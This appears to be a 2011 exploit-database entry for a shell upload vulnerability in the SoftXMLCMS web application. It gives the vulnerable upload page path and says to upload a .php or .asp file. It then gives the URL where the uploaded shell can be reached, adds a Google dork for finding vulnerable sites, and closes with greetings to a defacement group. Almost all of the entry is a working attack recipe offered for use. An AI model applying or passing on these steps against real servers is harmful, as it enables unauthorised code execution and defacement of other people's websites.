SoftXMLCMS - Arbitrary File Upload

Author: Alexander
type: webapps
platform: asp
port: 
date_added: 2011-04-16 
date_updated: 2011-04-16 
verified: 0 
codes: OSVDB-71867 
tags: 
aliases:  
screenshot_url:  
application_url: 

###########################################################################

Exploit Title : softxmlcms  Shell Upload Vulnerability

Google Dork : Powered by softxmlcms

Date : 2011-04-15

Author : *Alexander*

Software Link : http://www.softxml.com

Test On : Windows/asp/php

CVE : Web Applications

###########################################################################

===[ Exploit ]===

http://server/[patch]/XMLEditor2.0/uploadfile1.asp

Select the Choose File And Then Browse File.php  Or File.asp

===[ Upload To ]===

http://server/[patch]/images/File.php

Or

http://server/[patch]/images/File.asp

===[ Demo ]===

http://server/softxmlcms/XMLEditor2.0/uploadfile1.asp

###########################################################################

Greetz : http://Ashiyane.org/Forums

Behrooz_Ice , Q7X , Virangar , Black And All Ashiyane Defacers